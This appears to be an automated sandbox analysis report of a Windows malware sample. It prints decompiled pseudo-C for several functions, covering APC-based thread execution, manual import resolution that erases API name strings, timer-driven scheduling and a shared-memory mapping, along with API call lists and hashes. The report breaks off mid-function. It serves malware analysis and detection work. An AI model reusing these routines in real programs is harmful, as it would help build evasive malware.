Function 0040185E, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 116
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040185E(void* __ecx, void* __edx) {
				void* _v32;
				long _v36;
				long _v40;
				long _v44;
				void* __edi;
				long _t16;
				long _t18;
				long _t20;
				void* _t23;
				long _t26;
				long _t27;
				void* _t34;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t42;
				void* _t43;
				void* _t50;
				signed int _t54;
				void* _t55;
				intOrPtr* _t56;

				_t43 = __ecx;
				_t16 = E00401A35();
				_v36 = _t16;
				if(_t16 != 0) {
					L20:
					return _t16;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 = SwitchToThread() + 8;
					_t18 = E004012E1(0, _t54); // executed
					_v40 = _t18;
					Sleep(0x20 + _t54 * 4); // executed
					_t16 = _v40;
				} while (_t16 == 0xc);
				if(_t16 != 0) {
					goto L20;
				}
				_t20 = E00401BBE(_t43); // executed
				_v36 = _t20;
				if(_t20 != 0) {
					L18:
					_t16 = _v36;
					if(_t16 == 0xffffffff) {
						_t16 = GetLastError();
					}
					goto L20;
				}
				if(E00401415(_t43,  &_v32) != 0) {
					 *0x4030f8 = 0;
					L10:
					_t23 = CreateThread(0, 0, __imp__SleepEx,  *0x403100, 0, 0); // executed
					_t55 = _t23;
					if(_t55 == 0) {
						L17:
						_v40 = GetLastError();
						goto L18;
					}
					_t26 = QueueUserAPC(E0040121D, _t55,  &_v32); // executed
					if(_t26 == 0) {
						_t41 = GetLastError();
						TerminateThread(_t55, _t41);
						CloseHandle(_t55);
						_t55 = 0;
						SetLastError(_t41);
					}
					if(_t55 == 0) {
						goto L17;
					} else {
						_t27 = WaitForSingleObject(_t55, 0xffffffff);
						_v44 = _t27;
						if(_t27 == 0) {
							GetExitCodeThread(_t55,  &_v44);
						}
						CloseHandle(_t55);
						goto L18;
					}
				}
				_t42 = _v32;
				_t56 = __imp__GetLongPathNameW;
				_t34 =  *_t56(_t42, 0, 0); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L8:
					 *0x4030f8 = _t42;
					goto L10;
				}
				_t10 = _t50 + 2; // 0x2
				_t36 = E00401589(_t50 + _t10);
				 *0x4030f8 = _t36;
				if(_t36 == 0) {
					goto L8;
				}
				 *_t56(_t42, _t36, _t50); // executed
				E0040159E(_t42);
				goto L10;
			}

0x0040185e
0x0040186a
0x00401873
0x00401877
0x004019a7
0x004019ad
0x00000000
0x00000000
0x00000000
0x0040187d
0x0040187d
0x00401885
0x00401889
0x0040188e
0x0040189a
0x004018a0
0x004018a4
0x004018ab
0x00000000
0x00000000
0x004018b1
0x004018b8
0x004018bc
0x00401998
0x00401998
0x0040199f
0x004019a1
0x004019a1
0x00000000
0x0040199f
0x004018ce
0x0040190d
0x00401913
0x00401925
0x0040192b
0x0040192f
0x0040198e
0x00401994
0x00000000
0x00401994
0x0040193c
0x0040194a
0x00401952
0x00401956
0x0040195d
0x00401960
0x00401962
0x00401962
0x0040196a
0x00000000
0x0040196c
0x0040196f
0x00401977
0x0040197b
0x00401983
0x00401983
0x0040198a
0x00000000
0x0040198a
0x0040196a
0x004018d0
0x004018d4
0x004018dd
0x004018df
0x004018e3
0x00401905
0x00401905
0x00000000
0x00401905
0x004018e5
0x004018ea
0x004018f1
0x004018f6
0x00000000
0x00000000
0x004018fb
0x004018fe
0x00000000

APIs

Part of subcall function 00401A35: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040186F,?,00000000), ref: 00401A44
Part of subcall function 00401A35: GetVersion.KERNEL32(?,00000000), ref: 00401A53
Part of subcall function 00401A35: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401A62
Part of subcall function 00401A35: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401A7B

SwitchToThread.KERNEL32(?,00000000), ref: 0040187D

Part of subcall function 004012E1: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,0040188E,?,-00000008,?,?,?,?,?,?,?,0040188E), ref: 00401337
Part of subcall function 004012E1: memcpy.NTDLL(?,?,?,?,0040188E,?,-00000008,?,?,?,?,?,?,?,0040188E,-00000008), ref: 004013C9
Part of subcall function 004012E1: VirtualFree.KERNELBASE(?,00000000,00008000,?,0040188E,?,-00000008,?,?,?,?,?,?,?,0040188E), ref: 004013E4

Sleep.KERNELBASE(00000000,-00000008,?,00000000), ref: 0040189A
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004018DD
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004018FB
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 00401925
QueueUserAPC.KERNELBASE(0040121D,00000000,?,?,00000000), ref: 0040193C
GetLastError.KERNEL32(?,00000000), ref: 0040194C
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401956
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040195D
SetLastError.KERNEL32(00000000,?,00000000), ref: 00401962
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040196F
GetExitCodeThread.KERNEL32(00000000,?,?,00000000), ref: 00401983
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040198A
GetLastError.KERNEL32(?,00000000), ref: 0040198E
GetLastError.KERNEL32(?,00000000), ref: 004019A1

Strings

Mt, xrefs: 00401983

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
String ID: Mt
API String ID: 3896949738-1343272446
Opcode ID: 32a21c121f67ee702f8ed404f688d90cda7e27c4ba622994838616c88e9478df
Instruction ID: 6c092021eed64cdb6f3689297a31fccef9267fafad62cdda9b8d985e0428e81d
Opcode Fuzzy Hash: 32a21c121f67ee702f8ed404f688d90cda7e27c4ba622994838616c88e9478df
Instruction Fuzzy Hash: DF31A4B1500315ABC721AF759E4CD6F7BACEAC5351710063BF915F22E0E778C905CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A390, Relevance: 22.7, APIs: 15, Instructions: 224stringmemorylibraryCOMMON

Download Yara Rule

APIs

SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A3BB
GetLocalTime.KERNEL32(00000000), ref: 0041A3C3
GetLastError.KERNEL32 ref: 0041A3C9
lstrlen.KERNEL32(004283E8), ref: 0041A40E
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A474
lstrcpyW.KERNEL32(030226E8,00422448), ref: 0041A4CF
GlobalAlloc.KERNELBASE(00000000,031D6658), ref: 0041A4DE
GetModuleHandleW.KERNEL32(030226E8), ref: 0041A4EA
WriteProfileSectionW.KERNEL32(00000000,00000000), ref: 0041A59B
GetSystemDefaultLangID.KERNEL32 ref: 0041A5A1
SetVolumeLabelA.KERNEL32(00000000,00000000), ref: 0041A5AB
PurgeComm.KERNEL32(00000000,00000000), ref: 0041A5DC
FindResourceExW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A5EA
LoadLibraryA.KERNEL32(00422464), ref: 0041A5FF
DebugBreak.KERNEL32 ref: 0041A64F

Memory Dump Source

Source File: 00000000.00000002.575989176.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Handle$AllocBreakCalendarCommDebugDefaultErrorFindGlobalInfoLabelLangLastLibraryLoadLocalModuleNamedPipeProfilePurgeResourceSectionStateSystemTimeVolumeWritelstrcpylstrlen
String ID:
API String ID: 1567133184-0
Opcode ID: 4300f0f29b89cf6e047afdc51768585ead6129f067a14d40482dd75e15f1eb95
Instruction ID: cd6c0cb5b0c06eacf9907adaf0881b76aa36781c91320c4c6bd4b75b81c3103e
Opcode Fuzzy Hash: 4300f0f29b89cf6e047afdc51768585ead6129f067a14d40482dd75e15f1eb95
Instruction Fuzzy Hash: 2681DA31B46310AFF770EB60EC4AF9977A1A708715F904036E609A72D1C6B468D5CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 04F68701, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E04F68701(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4f6d1f8);
					_v20 = 0;
					_v16 = 0;
					L04F6AE90();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x4f6d224; // 0x1d0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4f6d204 = 5;
						} else {
							_t69 = E04F683CB(); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4f6d218 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E04F64529( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04F62954(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4f6d1fc);
							goto L21;
						} else {
							__eflags =  *0x4f6d200; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04F6185B();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4f6d200);
								L21:
								L04F6AE90();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x4f6d1f0, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x04f68701
0x04f68713
0x04f68716
0x04f68722
0x04f6872a
0x04f6872d
0x04f68893
0x04f68733
0x04f68733
0x04f68735
0x04f6873a
0x04f6873b
0x04f68741
0x04f68744
0x04f68747
0x04f68755
0x04f68760
0x04f68763
0x04f68765
0x04f68772
0x04f6877c
0x04f68780
0x04f68783
0x04f68788
0x04f68793
0x04f68793
0x04f6878a
0x04f6878a
0x04f68791
0x00000000
0x00000000
0x04f68791
0x04f6879d
0x00000000
0x04f687a0
0x04f687a4
0x04f687af
0x04f687af
0x04f687b6
0x04f687bb
0x04f687c2
0x04f687cb
0x04f687d1
0x04f687d4
0x04f687db
0x04f687de
0x00000000
0x00000000
0x04f687e0
0x04f687e3
0x04f687e6
0x04f687e9
0x00000000
0x04f687eb
0x04f687fa
0x04f687fa
0x00000000
0x04f68828
0x04f68828
0x04f6882d
0x04f6884c
0x04f6884e
0x04f68853
0x04f68854
0x00000000
0x04f6882f
0x04f6882f
0x04f68835
0x00000000
0x04f68837
0x04f68837
0x04f6883c
0x04f6883e
0x04f68843
0x04f68844
0x04f6885a
0x04f6885a
0x04f68862
0x04f6886d
0x04f68870
0x04f6887b
0x04f6887d
0x04f6887f
0x04f68882
0x00000000
0x04f68888
0x00000000
0x04f68888
0x04f68882
0x04f68835
0x00000000
0x04f6882d
0x04f687fd
0x04f687ff
0x04f68802
0x04f68803
0x04f68803
0x04f68807
0x04f68811
0x04f68811
0x04f68817
0x04f6881a
0x04f6881a
0x04f68820
0x04f68820
0x04f6889d
0x00000000

APIs

memset.NTDLL ref: 04F68716
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F68722
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F68747
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04F68763
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F6877C
HeapFree.KERNEL32(00000000,00000000), ref: 04F68811
CloseHandle.KERNEL32(?), ref: 04F68820
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04F6885A
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00000000), ref: 04F68870
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F6887B

Part of subcall function 04F683CB: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05E79320,00000000,?,74E5F710,00000000,74E5F730), ref: 04F6841A
Part of subcall function 04F683CB: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05E79358,?,00000000,30314549,00000014,004F0053,05E79314), ref: 04F684B7
Part of subcall function 04F683CB: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F6878F), ref: 04F684C9

GetLastError.KERNEL32 ref: 04F6888D

Strings

Ut, xrefs: 04F68811

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut
API String ID: 3521023985-8415677
Opcode ID: 135f2ae3ae5bd9a13827c3bb5d42d1349aeb6db4fc9d04dcd72c2fca307b6293
Instruction ID: e37f0eb777a5ff64c3903c2ae8d3242f1d5afc74d2ed5fafc147e5f92c2f056e
Opcode Fuzzy Hash: 135f2ae3ae5bd9a13827c3bb5d42d1349aeb6db4fc9d04dcd72c2fca307b6293
Instruction Fuzzy Hash: 0B514B71D01229FADF10EF95ED449EEBFB9EF053A4F10411AE526F2180D774AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F62A2B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E04F62A2B(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04F6AE8A();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4f6d230; // 0xf0a5a8
				_t5 = _t13 + 0x4f6e87a; // 0x5e78e22
				_t6 = _t13 + 0x4f6e580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04F6ABAA();
				_t17 = CreateFileMappingW(0xffffffff, 0x4f6d234, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x04f62a2b
0x04f62a33
0x04f62a37
0x04f62a3d
0x04f62a42
0x04f62a47
0x04f62a4a
0x04f62a4d
0x04f62a52
0x04f62a53
0x04f62a56
0x04f62a5b
0x04f62a62
0x04f62a6c
0x04f62a6e
0x04f62a6f
0x04f62a72
0x04f62a8e
0x04f62a94
0x04f62a98
0x04f62ae6
0x04f62a9a
0x04f62aa7
0x04f62ab7
0x04f62abf
0x04f62ad1
0x04f62ad5
0x00000000
0x00000000
0x04f62ac1
0x04f62ac4
0x04f62ac9
0x04f62acb
0x04f62acb
0x04f62aa9
0x04f62aab
0x04f62ad7
0x04f62ad8
0x04f62ad8
0x04f62aa7
0x04f62aed

APIs

GetSystemTimeAsFileTime.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,?,04F638E8,?,?,?,?,?,00000001), ref: 04F62A37
_aulldiv.NTDLL(00000001,00000000,54D38000,00000192), ref: 04F62A4D
_snwprintf.NTDLL ref: 04F62A72
CreateFileMappingW.KERNELBASE(000000FF,04F6D234,00000004,00000000,00001000,?), ref: 04F62A8E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04F638E8,?,?,?,?), ref: 04F62AA0
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04F62AB7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,04F638E8,?,?,?), ref: 04F62AD8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04F638E8,?,?,?,?), ref: 04F62AE0

Strings

`Rt, xrefs: 04F62A37

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: `Rt
API String ID: 1814172918-3187195841
Opcode ID: aaf3533926dd73acf5f317e0710e1a73b0579df56d52a31db5d7591929dd7a33
Instruction ID: 8fcbe849156cab4a9c75b2a0ee6514a3f9b72ec37a73e3dfa96c990927b7eb7c
Opcode Fuzzy Hash: aaf3533926dd73acf5f317e0710e1a73b0579df56d52a31db5d7591929dd7a33
Instruction Fuzzy Hash: 7321D572A40208FFD721FB68DC05F9E37A9EB44750F164165F656E7180EAB0E902CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00401AA1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401AA1(void* __ebx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed short _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _t33;
				intOrPtr _t35;
				struct HINSTANCE__* _t36;
				intOrPtr _t39;
				CHAR* _t43;
				_Unknown_base(*)()* _t44;
				void* _t51;
				intOrPtr _t52;
				signed short _t53;
				intOrPtr* _t56;
				signed short _t58;
				CHAR* _t59;
				CHAR* _t61;
				signed short* _t63;
				void* _t64;
				signed short _t71;

				_t51 = __ebx;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				_v12 = _v12 & 0x00000000;
				if(_t33 == 0) {
					L28:
					return _v12;
				}
				_t56 = _t33 + __ebx;
				_t35 =  *((intOrPtr*)(_t56 + 0xc));
				_v8 = _t56;
				if(_t35 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t61 = _t35 + _t51;
					_t36 = LoadLibraryA(_t61); // executed
					_v20 = _t36;
					if(_t36 == 0) {
						break;
					}
					_v16 = _v16 & 0x00000000;
					memset(_t61, 0, lstrlenA(_t61));
					_t52 =  *_t56;
					_t39 =  *((intOrPtr*)(_t56 + 0x10));
					_t64 = _t64 + 0xc;
					if(_t52 != 0) {
						L6:
						_t63 = _t52 + _t51;
						_t53 =  *_t63;
						if(_t53 == 0) {
							L23:
							_t35 =  *((intOrPtr*)(_t56 + 0x20));
							_t56 = _t56 + 0x14;
							_v8 = _t56;
							if(_t35 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v24 = _t39 - _t63 + _t51;
						_t71 = _t53;
						L8:
						L8:
						if(_t71 < 0) {
							if(_t53 < _t51 || _t53 >=  *((intOrPtr*)(_a4 + 0x50)) + _t51) {
								_t58 = 0;
								_v16 =  *_t63 & 0x0000ffff;
							} else {
								_t58 = _t53;
							}
						} else {
							_t58 = _t53 + _t51;
						}
						_t19 = _t58 + 2; // 0x2
						_t43 = _t19;
						if(_t58 == 0) {
							_t43 = _v16 & 0x0000ffff;
						}
						_t44 = GetProcAddress(_v20, _t43);
						_v28 = _t44;
						if(_t44 == 0) {
							goto L21;
						}
						if(_t58 != 0) {
							_t59 = _t58 + 2;
							memset(_t59, 0, lstrlenA(_t59));
							_t64 = _t64 + 0xc;
						}
						 *(_v24 + _t63) = _v28;
						_t63 =  &(_t63[2]);
						_t53 =  *_t63;
						if(_t53 != 0) {
							goto L8;
						} else {
							L22:
							_t56 = _v8;
							goto L23;
						}
						L21:
						_v12 = 0x7f;
						goto L22;
					}
					_t52 = _t39;
					if(_t39 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v12 = 0x7e;
				goto L26;
			}

0x00401aa1
0x00401aaa
0x00401ab0
0x00401ab6
0x00401bb7
0x00401bbb
0x00401bbb
0x00401abd
0x00401ac0
0x00401ac5
0x00401ac8
0x00401bb6
0x00000000
0x00401bb6
0x00401acf
0x00401acf
0x00401ad3
0x00401adb
0x00401ade
0x00000000
0x00000000
0x00401ae4
0x00401af3
0x00401af8
0x00401afa
0x00401afd
0x00401b02
0x00401b0e
0x00401b0e
0x00401b11
0x00401b15
0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba3
0x00401ba6
0x00000000
0x00000000
0x00401bb5
0x00000000
0x00401bb5
0x00401b1f
0x00401b22
0x00000000
0x00401b24
0x00401b24
0x00401b2d
0x00401b42
0x00401b44
0x00401b3b
0x00401b3b
0x00401b3b
0x00401b26
0x00401b26
0x00401b26
0x00401b49
0x00401b49
0x00401b4c
0x00401b4e
0x00401b4e
0x00401b56
0x00401b5e
0x00401b61
0x00000000
0x00000000
0x00401b65
0x00401b67
0x00401b75
0x00401b7a
0x00401b7a
0x00401b83
0x00401b86
0x00401b89
0x00401b8d
0x00000000
0x00401b8f
0x00401b98
0x00401b98
0x00000000
0x00401b98
0x00401b91
0x00401b91
0x00000000
0x00401b91
0x00401b06
0x00401b08
0x00000000
0x00000000
0x00000000
0x00401b08
0x00401bae
0x00000000

APIs

LoadLibraryA.KERNELBASE(00000002,00000002,00000000,?,?,?,00000002), ref: 00401AD3
lstrlenA.KERNEL32(00000002), ref: 00401AE9
memset.NTDLL ref: 00401AF3
GetProcAddress.KERNEL32(?,00000002), ref: 00401B56
lstrlenA.KERNEL32(-00000002), ref: 00401B6B
memset.NTDLL ref: 00401B75

Strings

~, xrefs: 00401BAE

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 351156a247ef8746b8b189a18376e88aee32497041b6ee624474b5af01910e6d
Instruction ID: fc26741da964415fb938b5e13a0985ab2f4dc1d3692ccb5b8c631dc6e8d924aa
Opcode Fuzzy Hash: 351156a247ef8746b8b189a18376e88aee32497041b6ee624474b5af01910e6d
Instruction Fuzzy Hash: 46316C75A01215ABDB14CF59C980BBEB7B5AF45304F10407AE905F73A1EB78FA06CB58

Uniqueness

Uniqueness Score: -1.00%

Function 04F6271A, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54
sleepmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E04F6271A(void* __edx, void* __edi, void* __esi, void* _a4) {
				void* _t9;
				void* _t11;
				void* _t14;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				void* _t21;
				signed int _t27;

				_t21 = __edx;
				_t9 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4f6d1f0 = _t9;
				if(_t9 != 0) {
					 *0x4f6d160 = GetTickCount();
					_t11 = E04F636F2(_a4);
					if(_t11 != 0) {
						return _t11;
					}
					do {
						_t27 = SwitchToThread() + 8;
						_t14 = E04F69718(_a4, _t27);
						Sleep(0x20 + _t27 * 4); // executed
					} while (_t14 == 1);
					_t16 =  *0x4f6d20c; // 0x1d4
					_a4 = 0;
					if(_t16 != 0) {
						__imp__(_t16,  &_a4);
						if(_t16 == 0) {
							_a4 = 0;
						}
						if(_a4 != 0) {
							 *0x4f6d218 = 1; // executed
						}
					}
					_t17 = E04F63826(_t21); // executed
					return _t17;
				}
				_t18 = 8;
				return _t18;
			}

0x04f6271a
0x04f62727
0x04f6272f
0x04f62734
0x04f62744
0x04f62749
0x04f62750
0x04f627b3
0x04f627b3
0x04f62754
0x04f6275f
0x04f62763
0x04f62772
0x04f62778
0x04f6277d
0x04f62785
0x04f62789
0x04f62790
0x04f62798
0x04f6279a
0x04f6279a
0x04f627a0
0x04f627a2
0x04f627a2
0x04f627a0
0x04f627ac
0x00000000
0x04f627ac
0x04f62738
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,?,04F64265,?), ref: 04F62727
GetTickCount.KERNEL32 ref: 04F6273B
SwitchToThread.KERNEL32(?,00000001,?,?,?,04F64265,?), ref: 04F62754
Sleep.KERNELBASE(00000000,-00000008,?,00000001,?,?,?,04F64265,?), ref: 04F62772
IsWow64Process.KERNEL32(000001D4,?,?,?,?,04F64265,?), ref: 04F62790

Strings

PWt, xrefs: 04F62790
Tt, xrefs: 04F62727

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCreateHeapProcessSleepSwitchThreadTickWow64
String ID: PWt$Tt
API String ID: 2183445336-2175288095
Opcode ID: 7de41cb754f720c75673d79faf834eff2f6e46ff57cceea691d2418edce9bdf0
Instruction ID: 3e7418e0e9f977297441f95a417d9ca2db47c94679d9f883968a8621eb88bf8e
Opcode Fuzzy Hash: 7de41cb754f720c75673d79faf834eff2f6e46ff57cceea691d2418edce9bdf0
Instruction Fuzzy Hash: CD118472A00208FFD710AF64FCC8E9D7BA8EB00359B11452AF95AC6100D778E8468A90

Uniqueness

Uniqueness Score: -1.00%

Function 04F63826, Relevance: 12.2, APIs: 8, Instructions: 203
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E04F63826(signed int __edx) {
				long _v32;
				long _v36;
				char _v40;
				char _v44;
				void* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				long _v68;
				signed int _v72;
				void* __edi;
				void* __esi;
				intOrPtr _t31;
				struct HINSTANCE__* _t33;
				long _t34;
				long _t37;
				intOrPtr _t38;
				void* _t42;
				signed int _t43;
				intOrPtr _t44;
				void* _t45;
				CHAR* _t48;
				long _t54;
				long _t55;
				void* _t60;
				void* _t62;
				intOrPtr _t70;
				void* _t73;
				void* _t78;
				intOrPtr _t82;
				void* _t83;
				signed char _t85;
				intOrPtr _t87;
				void* _t89;
				signed int _t90;
				long _t97;
				long _t100;
				CHAR* _t104;
				signed int _t105;
				void* _t107;

				_t92 = __edx;
				_t107 = (_t105 & 0xfffffff8) - 0x24;
				_t31 =  *0x4f6d230; // 0xf0a5a8
				_t1 = _t31 + 0x4f6e11a; // 0x4c44544e
				_v32 = 0;
				_v40 = 0;
				_v36 = 0;
				_t33 = GetModuleHandleA(_t1);
				if(_t33 != 0) {
					_t89 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					_t84 =  *(_t89 + 0x40) & 0x0000ffff;
